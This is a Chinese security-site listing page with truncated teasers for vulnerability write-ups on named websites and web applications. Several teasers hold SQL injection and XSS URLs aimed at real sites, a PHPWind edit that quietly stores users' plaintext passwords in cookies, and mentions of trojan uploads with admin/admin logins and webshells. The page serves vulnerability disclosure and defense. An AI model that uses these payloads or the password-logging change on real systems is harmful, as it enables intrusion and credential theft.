走秀网团购网站(秀团)应用设计缺陷造成任意密码关注热度:8

进入秀团登陆处，点忘记密码，选择手机号重设http://tuan.xiu.com/account/repass.php输入帐号的手机号码，点击获取验证码，此时注意抓包，或是使用firefox的firebug查看请求链接，将发现验证码..[详情]

百合网分站sql注射及修复方案 - 网站安全 - 自学关注热度:19

分站sql注射详细说明：http://qa.baihe.com/questions.php?action=morem=1database：expert漏洞证明：摘自 帅气凌云..[详情]

躺着也中枪,曲子龙从"旁注"讲企业网站网关注热度:19

之前写了一篇揭露某人自称传说中的高手,黑了飞乐宾政府网站的解密,被很多网站转载,今天曲子龙在这里就再谈网络安全问题,很多人对Quu这个名称并不是熟悉,很显然我也不是什么传说..[详情]

超蛋疼渗透某推广站 - 网站安全 - 自学php关注热度:11

ASP站做了防注入处理先没有去管他去跑目录发现EWE编辑器有数据库，但弱口令或许更直接 admin admin 进添加个asa准备上传木马，发现不能上传尝试列目录成功列出目录，发现一个蛋疼的事..[详情]

记录PHPWIND论坛明文登陆密码 - 网站安全 - 自学关注热度:19

在login.php Cookie(ck_info,$db_ckpath.\t.$db_ckdomain);下面加入Cookie(usernamep,$pwuser);Cookie(passwordp,$pwpwd);然后在index.php selectMode($m);上面加入if (!is_null(GetCookie(#39;user.....[详情]

珍爱网某频道一个SQL注射漏洞 - 网站安全 - 自学关注热度:5

http://lj.zhenai.com/96333partner/love_ceo/answer.jsp?id=31%20and%201=2%20union%20select%201,2,3,4,5--修复方案：过滤嘛作者 kobin97..[详情]

迅雷某分站或可造成内网被渗透 - 网站安全 - 自关注热度:19

http://icc.xunlei.com/5107/chat/chat.php使用用友的客户系统，存在较多上传漏洞。由于服务器在内网，加上权限较大。或造成内部网络被渗透。数万客户资料同时泄露。form enctype=multipart/form-da..[详情]

PJBlog 3.2.9.518 getwebshell 漏洞及临时解决方案 - 网站关注热度:10

作者：不走的钟版本：PJblog 3.2.9.518（2012/5/9日时为最新版本）漏洞利用条件：1、使用全静态模式（默认情况是全静态模式）2、用户可以发帖（默认普通用户不能发帖，所以有点鸡肋）漏..[详情]

关于XSS(二) - 网站安全 - 自学php关注热度:28

前面第一篇：http://www.2cto.com/Article/201205/131109.html 是xss基础。现在看看xss实战：第一个：拿www.b2b.cn做测试。用标注字符测试，搜索/#39;即可，看网页里有无所搜索字的显示，即回显。有则..[详情]

关于XSS(一) - 网站安全 - 自学php关注热度:27

XSS又叫CSS (Cross Site Script) ，跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意用户的特殊目的。..[详情]

无忧网络文章管理系统（5UCMS）注入漏洞 - 网站安关注热度:28

后台地址：admin/Login.asp数据库路径：inc/db 目录下漏洞地址：admin/ajax.asp?Act=modeextcid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26.....[详情]

咿呀咿呀淘客家族注入漏洞 - 网站安全 - 自学p关注热度:13

先说下 这个洞洞不是代码审计来的 是今天在日某站的是C 段一个站无意发现的关键字：Powered by 咿呀咿呀淘客家族关键字：inurl:announce.php?announceid=4(疯子补充)注入点http://www.2cto.com /show..[详情]

畅游两处反射型和存储型xss漏洞 - 网站安全 - 自关注热度:9

畅游的两处xss，大站其余洞洞不好找啊。两个xss，给个注册码吧，提交了好多，通过的没给，不通过的为啥也修复了。。反射型地址为：http://gm.changyou.com/login.jsp?msg=%3C/td%3E%3Cscript%3Eale..[详情]

中国移动mas2.0平台系统漏洞及修复方案 - 网站安关注热度:11

MAS是中国移动的短信代理网关（平台）。MAS是Mobile Agent Server的简称。目前多个政府部门、国有大型企业部门、运营商、金融部门都采用该平台。MAS2.0是中国新一代的代理网关系统。漏洞..[详情]

ASP.NET安全设置 ASPXSpy的终极和一般防御方法 - 网关注热度:13

终极防御（CmdShell、IIS Spy、Process、Services、UserInfo、SysInfo、RegShell）可能影响个别网站正常运行，请测试网站无问题再正式使用这方法。网站ASP.NET version切换成2.0.50727C:\WINDOWS\Microsoft.NE..[详情]